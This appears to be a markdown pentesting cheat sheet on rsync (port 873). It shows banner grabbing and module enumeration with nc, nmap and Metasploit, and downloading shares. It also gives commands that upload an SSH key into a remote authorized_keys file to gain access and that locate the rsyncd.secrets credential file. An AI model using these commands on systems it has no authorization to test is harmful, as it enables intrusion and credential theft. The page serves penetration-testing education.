Skip to content

Latest commit

 

History

History
76 lines (57 loc) · 2.48 KB

pentesting-rsync.md

File metadata and controls

76 lines (57 loc) · 2.48 KB

Pentesting Rsync

Rsync port 873

  • Basic information
  • rsync is a utility for efficiently transferring and synchronizing files between a computer and an external hard drive and across networked computers by comparing the modification timesand sizes of files.
nc -vn 127.0.0.1 873
(UNKNOWN) [127.0.0.1] 873 (rsync) open
@RSYNCD: 31.0        <--- You receive this banner with the version from the server
@RSYNCD: 31.0        <--- Then you send the same info
#list                <--- Then you ask the sever to list
raidroot             <--- The server starts enumerating
USBCopy        	
NAS_Public     	
_NAS_Recycle_TOSRAID	<--- Enumeration finished
@RSYNCD: EXIT         <--- Sever closes the connection


#Now lets try to enumerate "raidroot"
nc -vn 127.0.0.1 873
(UNKNOWN) [127.0.0.1] 873 (rsync) open
@RSYNCD: 31.0
@RSYNCD: 31.0
raidroot
@RSYNCD: AUTHREQD 7H6CqsHCPG06kRiFkKwD8g    <--- This means you need the password
  • Enumerate shared folders
  • An rsync module is essentially a directory share. These modules can optionally be protected by a password.
  • This options lists the available modules and, optionally, determines if the module requires a password to access:
nmap -sV --script "rsync-list-modules" -p <PORT> <IP>
msf> use auxiliary/scanner/rsync/modules_list

#Example using IPv6 and a different port
rsync -av --list-only rsync://[dead:beef::250:56ff:feb9:e90a]:8730
  • Manual Rsync
  • List a shared folder
rsync -av --list-only rsync:/10.10.232.5/shared_name
  • Copy all files to your local machine via the following command:
rsync -av rsync://192.168.0.123:8730/shared_name ./rsyn_shared
  • If you have credentials you can list/download a shared name using (the password will be prompted):
rsync -av --list-only rsync://[email protected]/shared_name
rsync -av rsync://[email protected]:8730/shared_name ./rsyn_shared
  • You could also upload some content using rsync (for example, in this case we can upload an authorized_keys file to obtain access to the box):
rsync -av home_user/.ssh/ rsync://[email protected]/home_user/.ssh
#full command syntax below
rsync -av id_rsa.pub rsync://[email protected]/files/sys-internal/.ssh/authorized_keys
  • Find the rsyncd configuration file:
find /etc \( -name rsyncd.conf -o -name rsyncd.secrets \)
  • Inside the config file sometimes you could find the parameter secrets file = /path/to/file and this file could contains usernames and passwords allowed to authenticate to rsyncd.